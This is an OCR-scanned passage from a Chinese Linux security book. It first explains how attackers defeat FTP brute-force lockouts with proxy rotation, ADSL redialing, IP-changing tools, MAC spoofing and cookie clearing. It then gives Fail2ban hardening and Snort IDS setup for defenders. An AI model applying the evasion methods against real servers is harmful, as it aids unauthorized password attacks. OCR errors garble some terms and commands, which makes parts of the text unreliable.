时 间 过 后 ， 继 续 发 起 暴力 破解 攻击 。 针 对 永久 封锁 王 的 情况 ， 有 4 种 方法 可 以 突破 。 


(1) 使 用 代理 突破 他 封锁 

单纯 地 使 用 代理 来 进行 FTP 暴力 破解 是 无 法 突破 下 锁定 的 ， 只 有 暴力 破解 程序 可 以 自动 
读 取代 理 列表 , 然后 在 目标 系统 允许 的 情况 下 , 发 起 几 次 暴力 破解 ,然后 再 更 换代 理 继续 发 起 
攻击 。 这 个 方法 实现 起 来 虽然 简单 , 但 是 实际 效果 并 不 好 ， 因 为 就 算是 网 络 攻击 者 也 不 能 够 保 
证 构建 一 个 拥有 足够 多 代理 , 并且 连接 速度 稳定 、 不 产生 意外 数据 接收 错误 的 代理 群 ， 如 何 获 
得 更 多 的 代理 呢 ? 可 以 去 网 页 上 搜索 , 也 可 以 用 代理 猎手 来 找 代理 , 它 最 大 的 特点 是 搜索 速度 
快 ， 最 快 可 以 在 十 几 分 钟 内 搜 完 一 个 B 类 地 址 。 如 果 单 纯 的 代理 无 法 满足 需要 的 话 ， 还 可 以 
换 用 MultiProxy 实现 人 P 动态 自由 切换 功能 ， 如 图 6.1 和 图 6.2 所 示 。 也 可 以 通过 使 用 
Sockscap+Sksockserver 实现 完美 组 合 以 达到 组 合 代理 的 目的 。 
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6.1 ”MultiProxy 的 切换 功能 
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图 6.2 选择 代理 服务 器 


(2) 使 用 ADSL 类 的 动态 人 P 机 制 突 破 人 P 封锁 

很 多 人 都 知道 ADSL 每 次 重新 拨号 以 后 都 会 分 配 一 个 新 的 卫 ， 而 且 网 络 中 也 已 经 存在 很 
多 不 断 自 动 拨号 的 程序 ， 如 果 攻 击 者 愿意 ， 自 己 编写 一 个 类 似 的 程序 和 暴力 破解 程序 相配 合 ， 
完全 可 以 做 到 无 差别 的 暴力 破解 。 当 然 ， 使 用 网 络 上 已 有 的 自动 拨号 程序 也 可 以 满足 要 求 。 

这 个 方法 总 的 来 说 是 比较 理想 的 ， 但 是 对 攻击 者 的 僵尸 计算 机 有 一 定 的 要 求 。 


(3) 使 用 Steganos Intemet Anonym Pro 和 Hide IP Easy 之 类 的 程序 突破 卫 封锁 

Steganos Internet Anonym Pro 是 国外 顶级 黑客 研究 出 的 自动 变化 IP 的 程序 ,是 一 套 功能 强 
大 的 网 络 身份 隐藏 工具 软件 ， 如 图 6.3 所 示 ,， 用户 可 以 通过 该 软件 很 简单 地 隐藏 自己 的 耻 、 更 
换 自己 的 他 。 一 般 情况 下 ，Steganos Internet Anonym Pro 的 IP 变化 是 1 秒 钟 变 一 次 ， 而 卫 地 
址 的 位 置 一 会 儿 在 英国 ， 一 会 儿 在 加 拿 大 ， 变 换 频率 非常 快 。 从 原理 上 讲 ，Steganos Intemet 
Anonym Pro 是 通过 代理 方式 实现 人 P 地 址 不 停 变 化 目的 的 ， 因 此 在 IP 地 址 变换 之 前 ， 需 要 先 
测试 该 程序 内 置 代 理 服务 器 的 工作 是 否 正 常 ,并 根据 测试 结果 筛选 出 工作 性 能 最 稳定 的 代理 服 
务 器 ， 如 图 6.4 所 示 。 使 用 Steganos Internet Anonym Pro 发 起 暴力 破解 攻击 的 话 ， 攻 击 者 如 果 
适当 调整 了 暴力 破解 程序 和 循环 间隔 ， 以 适应 Steganos Intemet Anonym Pro 的 IP 变换 间隔 ， 
完全 可 以 做 到 无 视 IP 限制 策略 。 


®) Buy Now only $29.95; 


ore 
— 
Te 
-一 一 一 
[we 
Eee 
= 
i 
ee 
ER 
人 
上 
IE 
Se—— 
ee 


de 


图 6.3 Hide IP Easy 界面 图 6.4 测试 结果 
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(4) 计算 机 标识 限制 及 其 突破 

最 烦琐 的 FTP 安全 策略 就 是 使 用 用 户 计算 机 的 标识 来 进行 限制 了 。 所 谓 用 户 计算 机 的 标 
识 是 指 在 FTP 服务 器 和 用 户 计算 机 的 交互 中 ， 服 务 器 通过 某 种 途径 记录 了 用 户 计 算 机 的 某 些 
标识 ， 如 MAC 地 址 、Cookies 信息 、 硬 件 编号 等 。 当 管理 员 设 置 的 连接 频率 、 错 误 次 数 限 制 
达到 的 时 候 ，FTP 服务 器 就 会 根据 计算 机 标识 来 识别 用 户 计 算 机 ， 进 而 进行 连接 限制 。 

这 样 的 限制 方法 在 网 络 上 出 现 的 不 多 ,不 过 国外 的 某 些 营利 性 组 织 经 常 使 用 这 样 的 方法 来 
进行 安全 保障 ， 如 投资 公司 、 股 票 顾问 、 非 法 博彩 等 站 点 。 从 技术 上 说 ， 要 对 这 种 策略 下 的 
FTP 服务 器 进行 暴力 破解 攻击 ， 比 较 难 一 一 但 也 不 是 说 毫 无 办 法 。 举 例 来 说 ， 常 见 的 这 种 限制 
是 通过 网 卡 的 MAC 地 址 识别 来 实现 ， 而 MAC 地 址 是 可 以 更 改 的 ， 攻 击 者 完全 可 以 自己 编写 
程序 ， 每 次 暴力 破解 发 起 的 时 候 ， 都 改变 一 次 MAC 地 址 。 当 然 ， 网 络 中 到 处 都 是 MAC 地 址 
的 改变 程序 ， 甚 至 很 多 硬件 信息 也 是 可 以 随意 生成 的 ， 如 Mac MakeUp 等 ， 如 图 6.5 所 示 。 


Mac MakeUp ver 93 ol z00-zoooHacwos 7 Bd 
从 下 拉 列 表 中 选择 适配器 屠 助 【 UnFackei by KaNeiill | 汉化 :peid ] 
[Ga FI ELGO WPL Liry 1000 DON (ver 13. 0 0 107) 

WC 地 址 ~ 
-器 列表 

Ye 地址 [572526707D 避 CE 

两 lon = 了 

厂 mwc 历史 


谍 隐 基 虚拟 适 配 缮 
本 扩 届 功 能 荣 单 


图 6.5 Mac MakeUp 随意 生成 的 硬件 信息 


如 果 目 标 FTP 服务 器 是 通过 Cookies 等 信息 来 辅助 验证 的 话 ， 突 破 方法 就 更 为 简单 了 。 
攻击 者 可 以 自己 编程 实现 每 次 暴力 破解 前 都 清空 一 次 Cookies， 也 可 以 使 用 Steganos Internet 
Anonym Pro 等 工具 实现 Cookies 自动 删除 、 浏 览 记 录 自 动 删除 等 。 


6.4.4 ”应 对 措施 一 一 第 三 方 软件 Fail2ban 加 固 方法 


总 的 来 说 ， 只 要 FTP 服务 器 妄图 让 正常 用 户 使 用 ， 要 彻底 杜绝 FTP 的 暴力 破解 攻击 就 非 
常 困难 ,至 少 目前 没有 办 法 实现 ， 下 面 我 们 用 第 三 方 软件 来 进行 加 固 ,经 过 笔者 长 期 对 比 发 现 
Fail2ban 对 于 解决 暴力 破解 、 非 法 扫描 能 起 到 比较 好 的 效果 ， 个 人 觉得 效果 优 于 BlockHosts， 
它 是 基于 防火 墙 链 添加 新 规则 , 并 发 送 E-mail 通知 系统 管理 员 。Fail2ban 不 仅 可 以 自动 识别 可 
能 的 暴力 入 侵 ， 而 且 可 按照 快速 且 简易 的 用 户 自 定义 规则 去 分 析 ， 因 为 Fail2ban 的 原理 是 调 
用 iptables 实时 阻挡 外 界 的 攻击 , 按照 要 求 在 一 段 时 间 内 找 出 符合 条 件 的 日 志 , 所 以 系统 里 必 
须 装 有 iptables 以 及 Python 的 支持 。 
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1. 下 载 安装 
在 DEBIAN 系统 下 安装 Fail2ban 是 非常 快 的 。 以 root 用 户 执行 下 列 命令 : 
# apt-get install fail2ban 


在 GNU/Linux 系统 上 进行 源码 安装 ， 为 了 编译 Fail2ban， 需 要 下 载 最 新 的 源码 
(http:/sourceforge net/projects/fail2ban) 。 获 取 后 ， 可 以 改变 源码 目录 ， 并 执行 下 列 命令 : 


#tar xvjf fail2ban-x.x.x.tar.bz2 
将 会 在 当前 工作 目录 下 得 到 一 个 Fail2ban 的 解压 后 的 源码 目录 。 以 root 用 户 执行 安装 : 
#./setup.py install 


Fail2ban 会 安装 在 /usr/share/fail2ban/ 和 msrbin/ 目 录 中 ， 安 装 完成 后 ， 可 根据 自己 的 情 
况 更 改 一 下 配置 即 可 。 


2. 系统 配置 
-个 典型 的 配置 文件 如 下 : 


/etc/fail2ban/ 

上 一 一 action.d 

广 -一 dummy.conf 

广 -一 hostsdeny.conf 
| 一 一 iptables.conf 
| 一 一 mail-whois.conf 
| 一 一 mail.conf 
i shorewall.conf 
一 fail2ban.conf 
Fo fail2ban.local 
= 


-一 一 apache-auth .conf 


| 

| -一 一 apache-noscript.conf 
| -一 一 couriersmtp.conf 

| 广 -一 postfix.conf 

| -一 一 proftpd.conf 

| 一 一 qmail.conf 

| 一 一 sasl.conf 

| -一 一 sshd.conf 

| [一 一 vsftpd.conf 
一 一 jail.conf 


[一 一 jail.local 


每 个 .conf 文件 都 会 被 名 为 .local 的 文件 覆盖 。 首 先 .conf 被 读 取 ， 其 次 是 .local。 新 的 配置 
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会 覆盖 原来 的 。 因此 .local 文件 不 必 包 含 每 个 相对 于 .conf 中 的 选项 , 只 填写 想 要 履 盖 的 设置 即 


可 。 
编辑 fail2ban.conf: 
#vi /etc/fail2ban.conf # 以 daemon 方式 启动 fail2ban 
background = true # 人 允许 尝试 次 数 
maxfailures = 3 # 触 发 maxfailures 之 后 的 封锁 时 间 ( 秒 ) ; 设 为 -1 
表示 永远 封锁 
bantime = 3600 # 以 findtime ( 秒 ) 时 间 内 的 错误 记录 作为 
maxfailures 的 计数 基准 
findtime = 600 # 排 除 IP 范围 ， 以 空白 隔 开 
ignoreip = 127.0.0.1 192.168.0.0/24 # 不 启用 mail 通知 
[MAIL]enabled = false # 修 改 自 VSFTPD， 未 提 及 的 部 分 保持 原 设 定 


[PROFTPD]enabled = true 

logfile = /var/log/proftpd/proftpd.1log 

failregex = no such User|Incorrect password # 未 提 及 的 部 分 保持 原 设 定 
[SSH]enabled = true 


logfile = /var/log/secureservice fail2ban 


这 个 服务 启动 以 后 ， 每 天 都 能 在 /var/log/fail2ban.log 中 看 到 被 攻击 的 “肉鸡 ”。 
复制 初始 化 脚本 到 系统 的 /etc/init.d 目录 下 ， 执 行 chkconfig 和 update-re.d， 或 手动 创建 
一 个 符号 链接 。 


3. 设置 权限 


# chmod 755 /etc/init.d/fail2ban 
#chkconfig -a fail2ban 
#1ln -s /etc/init.d/fail2ban /etc/rc2.d/s20fail2ban 


最 后 ， 整 合 Fail2ban 到 日 志 循环 中 。 
创建 文件 /etc/logrotate.d/fail2ban: 


/var/log/fail2ban.log { 


} 


weekly 
rotate 允 
missingok 
compress 
postrotate 
/usr/local/bin/fail2ban-client reload 1>/dev/null || true 


endscript 


下 面 看 看 它 的 效果 吧 。 先 浏览 一 下 iptables: 
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#iptables -L -nv 


Pkts bytes target protopt in out source destination 

301 12740 fail2ban-ftp tcp-— * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:2l 
3354” 253K fail2ban=SSH tcp —— * * 0:0.0:0/0 0.0.0.0/0 tcp dpt:22 
438 "33979, fail2ban=httpdtep ==*  * 00-0.0/0 0.0.0.0/0 tcp dpt:80 
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes) 

pkts bytes target prot opt in out source destination 
Chain OUTPUT (policy ACCEPT 5703 packets, 829K bytes) 

pkts bytes target prot opt in out source destination 
Chain fail2ban-SSH (1 references) 

pkts bytes target prot opt in out source destination 
3354 253K RETURN ED 0.0.0.0/0 0.0.0.0/0 

Chain fail2ban-ftp (1 references) 

pkts bytes target prot opt in out source destination 
301 12740 RETURN I 村 0.0.0.0/0 0.0.0.0/0 

Chain fail2ban-httpd (1 references) 

pkts bytes target prot opt in out source destination 
438 33979 RETURN UY a 0.0.0.0/0 0.0.0.0/0 


4. 查看 Fail2ban 的 日 志 
通过 以 下 命令 就 能 方便 地 查看 到 被 记录 的 非法 暴力 破解 人 P: 


# cat fail2ban.log | grep '] Ban' 


最 后 , 我 们 要 注意 Fail2ban 是 一 个 日 志 分 析 器 , 在 写 入 日 志 前 不 会 做 任何 事情 。 大 多 数 系 
统 日 志和 守护 进程 都 会 缓冲 它们 的 输出 。 这 可 能 会 和 Fail2ban 性 能 有 所 冲突 。 因 此 ,最 好 能 禁止 
缓冲 系统 日 志和 守护 进程 ， 以 提高 性 能 。 从 目前 来 看 ， 只 要 FTP 服务 器 希望 让 正常 用 户 使 用 ， 
要 完全 杜绝 FTP 暴力 破解 攻击 很 难 ， 因 此 要 从 细微 之 处 入 手 ， 尽 量 降低 被 暴力 破解 的 概率 。 
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7.1 在 Linux 下 部 署 IDS 案例 


目前 企业 网 络 的 威胁 来 自 于 两 个 位 置 : 一 个 是 内 部 ， 另 一 个 是 外 部 。 来 自 外 部 的 威胁 都 能 
被 防火 墙 所 阻止 , 但 内 部 攻击 不 好 防范 。 因 为 公司 内 部 人 员 对 系统 了 解 很 深 且 有 合法 的 访问 权 
限 ， 所 以 内 部 攻击 更 容易 成 功 。IDS 为 信息 提供 保护 ， 已 经 成 为 深度 防御 策略 中 的 重要 部 分 。 
IDS 与 现实 世界 里 的 防 窃 报警 装置 类 似 。 它 们 都 对 入 侵 进行 监控 ， 当 发 现 可 疑 行为 时 ， 就 向 特 
定 的 当事人 发 出 警报 。IDS 分 为 两 类 : 主机 IDS (HIDS) 和 网 络 IDS (NIDS) 。HIDS 安装 在 
受 监控 主机 上 ， 拥 有 对 敏感 文件 的 访问 特权 。HIDS 利用 这 一 访问 特权 对 异常 行为 进行 监控 。 
NIDS 存在 于 网 络 中 ， 通 过 捕获 发 往 其 他 主机 的 流量 来 保护 大 量 网 络 设 施 。HIDS 和 NIDS 都 
有 各 自 的 优点 和 缺点 ， 完 整 的 安全 解决 方案 应 包括 这 两 种 IDS， 对 于 这 一 点 比较 难 做 到 。 不 了 
解 这 一 领域 的 人 常常 认为 IDS 就 像 一 把 万 能 钥匙 ， 能 解决 所 有 的 安全 问题 。 例 如 有 的 单位 花 
了 大 笔 的 钱 购 置 了 商业 IDS， 由 于 配置 不 当 反 而 搞 得 连连 误 报 ， 一 下 子 就 把 数据 库 塞 满 了 ， 大 
量 丢 包 ， 进 而 崩溃 。 这 种 想法 使 人 们 以 为 只 要 将 IDS 随便 安放 在 网 络 中 就 万 事 大吉 了 ， 不 必 
担心 任何 问题 , 实际 上 远 非 如 此 。 没 有 人 会 认为 E-mail 服务 器 直接 连 在 Interet 上 就 能 正确 运 
行 。 同 样 ， 也 需要 正确 的 计划 IDS 策略 、 传 感 器 的 放置 。 


7.1.1 安装 Snort 


1. 安装 准备 工作 


在 安装 前 我 们 要 知道 需要 监控 的 内 容 , 理想 的 状况 是 对 一 切 进 行 监控 。 所 有 网 络 设备 和 任 
何 从 外 部 到 企业 的 连接 都 处 在 Snort 的 监视 之 下 。 尽 管 这 一 计划 对 小 公司 只 有 几 十 台 机 器 是 很 
可 能 实现 的 ,但 是 当 大 型 企业 中 连接 上 千 台 网 络 设备 时 ， 就 成 了 难以 施展 的 艰巨 任务 。 为 了 加 
强 Snort 检测 的 安全 性 ， 最 好 能 为 监控 网 段 提 供 独立 的 智能 交换 机 ， 如 果 需 要 分 布 式 的 配置 ， 
可 以 把 服务 器 和 控制 台 接 在 一 个 交换 机 上 , 而 其 他 传感器 放置 在 不 同 的 物理 位 置 , 但 这 样 的 成 
本 会 有 所 增加 。Snort IDS 的 维护 问题 是 无 法 回避 的 , 迟早 要 对 Snort 特征 进行 更 新 并 编写 定制 
的 规则 ， 所 以 你 还 需要 一 个 懂得 维护 IDS 的 专业 人 士 。 


2. 深入 Snort 


Snort 包含 很 多 可 配置 的 内 部 组 件 ， 它 们 对 误 报 、 漏 报 以 及 抓 包 和 记录 日 志 等 的 性 能 都 有 
很 大 影响 。 能 深入 了 解 Snort 的 内 幕 有 助 于 有 效 地 利用 Snort 监控 入 侵 。 还 会 帮助 你 根据 自己 


部 署 IDS 案例 分 析 第 7 这 


的 网 络 定制 Snort， 并 且 避 免 它 的 一 些 常见 缺陷 。 


(1) 利用 libpcap 输送 Snort 包 

Snort 没有 自己 的 捕 包 工具 ， 它 需要 一 个 外 部 的 捕 包 程序 库 : libpcap。Snort 利用 libpcap 
独立 地 从 物理 链 路 上 进行 捕 包 ， 它 可 以 借助 libpcap 的 平台 成 为 一 个 真正 的 与 平台 无 关 的 应 用 
程序 。 直 接 从 网 卡 捕 包 的 任务 由 libpcap 承担 。 这 一 捕获 原始 包 的 工具 是 由 底层 操作 系统 提供 
给 其 他 应 用 程序 使 用 的 。Snort 需要 数据 保持 原始 状态 ， 它 利用 的 就 是 原始 包 所 有 的 协议 头 信 
息 都 保持 完整 ， 未 被 操作 系统 更 改 的 特性 来 检测 某 些 形式 的 攻击 。 由 于 利用 libpcap 获取 原始 
包 ， 一 次 只 能 处 理 一 个 包 ， 这 不 是 最 好 的 方法 ， 这 也 成 为 了 它 对 千 兆 网 络 进行 监控 的 瓶颈 。 


(2) 包 解 码 器 

包 一 旦 被 收集 到 ，Snort 就 必须 对 每 一 个 具体 的 协议 元 素 进 行 解 码 。 在 包 通 过 各 种 协议 的 
解码 器 时 ， 解 码 后 的 包 数 据 将 堆 满 一 个 数据 结构 。 包 数据 一 旦 被 存 入 数据 结构 中 ， 就 会 迅速 被 
送 到 预 处 理 程序 和 检测 引擎 进行 分 析 。 


(3) 预 处 理 程序 
Snort 的 预 处 理 分 为 两 类 ， 它 们 可 以 用 来 针对 可 疑 行为 检查 包 或 者 修改 包 ， 以 便 检测 引擎 
能 对 其 进行 正确 解释 。 预 处 理 的 参数 可 以 通过 snort.conf 配置 文件 来 调整 。 预 处 理 器 包括 : 


Frag2 

Stream4 
Stream4 reassemble 
Http_decode 
RPC decode 
BO 
Telnet_decode 
ARPspoof 
ASNI decode 
Fnord 
Conversation 
Portscan2 
SPADE 


(4) 检测 引擎 
检测 引擎 将 流量 与 规则 按 其 载 入 内 存 的 顺序 依次 进行 匹配 ， 是 Snort 的 一 个 主要 部 件 。 


(5) 输出 插件 
Snort 的 输出 插件 用 于 接收 Snort 传 来 的 入 侵 数据 。 输 出 插件 的 目的 是 将 报警 数据 转 储 到 
另 一 种 资源 或 文件 中 。 
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(6) Snort 的 性 能 问题 

Snort 有 效 工作 的 性 能 可 能 会 受到 以 下 几 种 选择 的 限制 : 硬件 、 操 作 系统 和 连 网 的 组 件 。 

对 Snort 的 性 能 影响 最 大 的 是 Snort 的 配置 设 定 以 及 规则 集 设 置 。 内 部 瓶颈 则 主要 出 现在 
包 解 码 阶段 ， 它 比 一 般 的 规则 都 要 更 加 耗费 系统 资源 。 启 用 的 检查 包 内 容 的 规则 越 多 ，Snort 
的 运行 就 需要 越 多 的 系统 资源 。 如 果 要 激活 预 处 理 程序 中 的 某 些 设置 选项 , 就 会 需要 消耗 额外 
的 系统 资源 。 最 明显 的 例子 就 是 启用 在 frag2 预 处 理 程序 和 stream4 预 处 理 程序 中 的 “最 大 存 
储 容量 (memcap) ”选项 。 如 果 您 打算 激活 大 量 耗费 资源 的 预 处 理 程序 选项 ， 最 好 确定 有 足 
够 的 硬件 资源 的 支持 。 


(7) SPAN 端口 监控 

在 监控 时 我 们 需要 做 SPAN，SPAN 端口 监控 是 另外 一 种 在 现 有 网 络 结构 中 引入 监控 网 段 
的 方法 。Cisco 交换 机 的 中 高 端 产品 都 有 SPAN 端口 或 镜像 端口 。SPAN 端口 既 可 以 是 一 个 专 
用 端口 ， 也 可 以 通过 该 端口 实现 交换 机 上 所 有 端口 的 配置 选项 设 定 。 利 用 SPAN 端口 的 特点 
实现 监控 功能 是 一 种 实用 的 方法 。 使 用 SPAN 端口 监控 法 并 不 会 给 所 要 监控 的 网 络 引 入 单 点 
错误 的 问题 。 与 网 内 Hub 监控 法 相 比 ， 这 是 使 用 SPAN 端口 监控 最 大 的 优点 。 

需要 注意 的 是 , 镜像 顺序 问题 当 所 监控 的 网 络 要 升级 为 高 带宽 网 络 时 ， 可 以 只 镜像 一 个 
端口 ， 对 Snort 的 性 能 观察 一 段 时 间 ， 并 根据 需要 进行 调整 。 当 Snort 的 这 个 端口 调整 好 之 后 ， 
可 以 切合 实际 的 、 循 序 渐进 的 增加 其 他 端口 ， 千 万 不 能 一 下 子 增 加 过 多 的 端口 。 

利用 SPAN 端口 监控 法 将 会 降低 本 身 交 换 设备 的 性 能 ， 用 SPAN 端口 会 使 交换 设备 的 内 
存 负担 过 重 ， 从 而 使 设备 的 性 能 下 降 。 


(8) 安装 Snort 


操作 系统 : Red Hat Enterprise Linux 5。 
数据 库 : MySQL (mysql-5.1 )。 

Web 服务 器 : Apache (httpd-2.2 )。 
Web 语言 : PHP (php-5.2 )。 


首先 我 们 需要 安装 MySQL、Apache (必须 安装 mod_ssl 模块 ) 、PHP， 并 配置 Apache， 
这 些 在 前 面 章节 已 经 详细 讲解 过 。 接 下 来 编译 安装 snort: 


#tar zxf snort-2.8.5.2.tar.gz 
#ed Snort=258552 
#./configure --with-mysql=/usr/local/mysql &make & make install 


创建 配置 文件 目录 mkdir /etc/snort。 
贺 创建 日 志 目录 mkdir /var/log/snort。 
加 安装 Snort 规则 : 


tar zxf snortrules-snapshot-2860.tar.gz 
tar zxf snortrules-snapshot-CURRENT.tar.gz 


mv rules/ /etc/snort 
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cp * /etc/snort/ 


修改 /etc/snort/snort.conf 文件 。 

加 监听 的 本 地 网 段 192.168.150.0/24。 

四 有 5 行 以 “output database: ”开头 的 行 ， 将 其 “#"” 号 去 掉 。 
创建 Snort 数据 库 : 


mysql> create database snort; 

mysql> connect snort; 

mysql> source /usr/local/src/snort-2.8.4.1/schemas/create mysql; 
mysql>grant CREATE,INSERT,SELECT,DELETE,UPDATE on snort.* to snort; 
mysql>grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to snort@localhost; 


另外 有 兴趣 的 读者 可 以 尝试 使 用 phpMyAdmin 这 一 工具 ，phpMyAdmin 是 一 个 基于 Web 
的 MySQL 数据 库 管理 工具 。 它 能 够 创建 /删除 数据 库 、 创 建 /删除 /修改 表格 、 删 除 /编辑 /新 增 
字段 、 执 行 SQL 脚本 等 。 


(9) 启动 Snort 
启动 Snort， 脚 本 如 下 ， 效 果 如 图 7.1 所 示 。 


#snort -c /etc/snort/snort.conf 
*** interface device lookup found: eth0 
Initializing Network Interface eth0 
Decoding Ethernet on interface eth0 


[ Port Based Pattern Matching Memory ] 
+—[AC-BNFA Search Info Summary] 


| Instances 

| Patterns : 128862 

| Pattern Chars : 1409448 

| Num States : 961559 

| Num Match States : 156899 

| Memory : 34.78Mbytes 
| Patterns : 6.26M 

| Match Lists : 16.90M 

| Transitions : 11.42M 


图 7.1 启动 Snort 后 的 效果 
为 了 Snort 安全 ， 应 避免 利用 root 身份 运行 Snort， 这 时 需要 创建 专用 的 用 户 和 组 : 
#useradd snort 
如 果 是 redhat， 则 在 创建 用 户 的 同时 就 创建 了 Snort 组 : 
#snort-u snort-g snort-U-d-D-c/etc/snort/snort.conf 


接 下 来 就 需要 安装 ACID、Adodb 和 Jpgraph, ACID(Analysis Console for Incident Databases) 
是 Snort 使 用 的 标准 分 析 员 控制 台 软 件 , 是 一 个 基于 PHP 的 分 析 引 擎 , 它 能 够 搜索 、 处 理 Snort 


Linux ”企业 应 用 案例 精 解 


产生 的 数据 库 。 下 面 是 安装 及 配置 过 程 :将 Adodb 和 Jpgraph 的 tar 包 复 制 到 Apache 根 目 录 下 ， 
解 开 ACID 包 后 ， 修 改 acid_confphp 配置 即 可 。 注意 ，ACID 配置 参数 都 在 acid_config php 文 
件 里 ， 所 有 的 值 都 必须 放 在 双 引 号 内 ， 而 且 后 面 要 加 上 分 号 ， 必 须 以 SSL 模式 启动 Apache， 
定位 到 ACID 的 主页 https://IP/acid/。 


(10) 在 双 网 卡 上 运行 Snort 
可 以 配置 Snort 来 侦 听 多 个 网 卡 ， 问 题 是 Snort 每 个 命令 行 选项 (-i) 只 接受 一 个 网 卡 。 有 
两 个 在 多 种 网 卡 上 运行 Snort 的 方法 : 
@ 为 每 个 网 卡 运行 一 个 独立 的 Snort 进程 。 
@ 通过 绑 定 Linux 内 核 的 特征 将 所 有 的 网 卡 绑 定 在 一 起 。 


利用 Snort 监控 多 个 网 卡 时 选择 哪 种 方法 取决 于 环境 和 优先 级 等 多 种 因素 运行 多 个 Snort 
进程 会 增 大 工作 量 , 并 浪费 大 量 的 无 法 接受 的 处 理 器 时 间 周 期 。 如 果 有 可 用 的 资源 来 运行 两 个 
或 多 个 Snort 进程 ， 那 么 应 该 考虑 一 下 数据 管理 问题 。 假 设 所 有 的 Snort 实例 以 同样 的 方式 配 
置 ， 那 么 同样 的 攻击 会 被 报告 多 次 。 这 会 令 入 侵 检 测 系统 管理 员 头 疼 ， 尤 其 是 报警 的 时 候 。 当 
面 对 不 同 的 网 卡 有 不 同 的 入 侵 检 测 需求 时 ， 为 每 个 网 卡 分 配 单个 Snort 进程 是 最 理想 的 。 如 果 
为 每 个 网 卡 都 分 配 了 一 个 独立 的 Snort 进程 ， 那 么 就 为 每 个 网 卡 创建 一 个 类 似 虚 拟 的 传感器 。 
在 一 个 机 器 上 架设 几 个 “传感器 ”， 就 可 以 为 每 个 独立 的 Snort 进程 载 入 不 同 的 配置 、 规 则 和 
输出 插件 。 这 最 适合 于 独立 的 Snort 进程 。 另 一 方面 ， 如 果 不 能 这 样 或 者 不 想 为 每 个 网 卡 启 用 
额外 的 Snort 进程 ， 可 以 将 两 个 网 卡 绑 定 在 一 起 。 这 样 当 启用 Snort 时 ， 就 能 用 -i 命令 选项 指 
定 一 个 已 被 绑 定 的 网 卡 〈 如 bond0) 。 

为 了 实现 这 个 目的 ， 请 编辑 /etc/modules.conf， 加 入 如 下 行 : 


alias bond0 bonding 


现在 , 每 次 重启 机 器 时 都 需要 在 将 IP 地 址 信息 分 配给 网 卡 之 后 , 输入 以 下 命令 来 绑 定 
网 卡 : 


ifconfig bondup 
ifenslave bond0 eth0 
ifenflave bond0 ethl 


注意 : 可 将 这 些 命令 放 在 一 个 脚本 里 ， 在 系统 启动 时 运行 该 脚本 。 当 运行 Snort 时 ， 可 以 
按 如 下 方式 使 用 bond0 网 卡 : 


snort < options> -i bond0 
7.1.2 维护 Snort 


在 某 些 方面 ， 需 要 对 Snort 做 一 些 重要 的 改动 以 保持 它 的 相关 性 ， 如 升级 规则 集 、 修 改 配 
置 选项 ， 最 后 升级 Snort 应 用 程序 本 身 。 如 果 运 行 的 是 多 个 传感器 构成 的 分 布 式 系统 ， 虽 然 这 
些 手工 方法 也 是 可 取 的 ， 但 手工 修改 多 个 传感器 就 会 变 得 相当 困难 ， 还 容易 出 错 。 


部 署 IDS 案例 分 析 第 7 齐 


这 时 我 们 需要 管理 助手 一 一 SnortCenter， 它 是 一 款 基于 Web 方式 升级 和 维护 Snort 配置 的 管 
E 应 用 软件 ， 是 一 款 用 于 远程 管理 Snort 传感器 的 应 用 软件 。 它 用 的 是 PHP/MySQL Web 界面 。 
特征 如 下 : 


@ Snort 后台 进程 状态 监视 器 。 
远程 Snort 停止 /启动 /重启 。 
SnortCenter 用 户 的 访问 控制 。 
传感器 组 。 

ACID 集成 。 


r= 


SnortCenter 包括 基于 PHP 的 管理 控制 台 和 SnortCenter 代理 。SnortCenter 管理 控制 台 安装 
在 Snort 服务 器 上 ， 而 SnortCenter 传感器 代理 被 安装 在 所 管理 的 传感器 中 。SnortCenter 增强 
了 可 能 安装 在 分 布 式 系统 上 的 Snort， 服 务 器 端 需要 如 下 的 软件 包 : 


@ MySQL 
Apache 
PHP 
ADODB 
OpenSSL 
cURL 


除了 cURL 软件 包 , 其 他 的 软件 包 应 该 都 是 大 家 比较 熟悉 的 , 因为 绝 大 多 数 的 操作 系统 都 
包括 这 些 软件 包 , SnortCenter 管理 控制 台 可 运行 在 Windows、Linux 和 BSD 系统 上 。SnortCenter 
传感器 代理 需要 安装 在 基于 UNIX 操作 系统 的 Perl 上 。 该 代理 在 一 些 附加 的 预 编 译 程序 的 帮 
助 下 可 以 运行 在 基于 Windows 的 传感器 上 。 

要 安装 SnortCenter， 其 前 提 是 要 安装 并 配置 好 ACID， 因 此 应 该 预先 在 作为 Snort 服务 器 
的 机 器 上 安装 MySQL、Apache、PHP、ADODB 和 OpenSSL。 而 后 就 可 以 将 SnortCenter 安装 
在 Linux 系统 上 了 。 


1. SnortCenter 管理 控制 台 

在 安装 SnortCenter 之 前 唯一 还 需要 安装 的 软件 包 是 cURL， 这 是 一 个 不 需要 用 户 干涉 、 
通过 URL 传输 文件 的 命令 行 工 具 ， 它 用 于 管理 和 控制 Snort 传感器 。 可 以 通过 如 下 命令 行 检 
查 在 Red Hat 上 是 否 安装 了 该 软件 包 : 


Rpm -qa | grep curl 


该 命令 行将 会 查询 包含 了 curl 字符 串 的 软件 包 ， 如 果 没 有 安装 cURL， 可 以 去 网 上 下 载 。 
下 一 步 在 Web 根 目录 下 建立 SnortCenter 目录 ， 将 下 载 文 件 包 解压 到 这 个 目录 里 ， 然 后 通 
过 配置 config .php 文件 来 配置 SnortCenter。 对 于 这 个 配置 文件 需要 说 明 的 有 以 下 几 点 。 


@ DBlib path: 用 于 设 定 Adodb 库 的 位 置 。 
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url_path: 该 变量 应 设 为 cURL 可 执行 文件 的 位 置 。 

DBtype: 这 里 设置 所 安装 的 数据 库 的 类 型 。 

DB_dbname: 这 是 在 下 一 步 中 要 创建 的 SnortCenter 数据 库 名 。 

DB_host DB_host: 是 Snort 服务 器 的 主机 名 。 如 果 SnortCenter 管理 控制 台 和 数据 库 安 
装 在 同一 台 计 算 机 上 ， 应 将 该 参数 设 为 localhost。 

@ DB _ user SnortCenter: 登录 数据 库 所 用 的 账号 。 

@ DB_password: 数据 库 用 户 的 密码 。 

@ DB _ port DB_ port: 是 数据 库 运行 的 端口 号 。 


保存 修改 并 关闭 config.php， 下 一 个 任务 是 建立 DB_dbname 变量 指定 的 数据 库 ， 首 先 需 
要 登录 MySOL 数据 库 ， 然 后 创建 SnortCenter 数据 库 ， 命 令 如 下 : 

>create database snortcenter; 

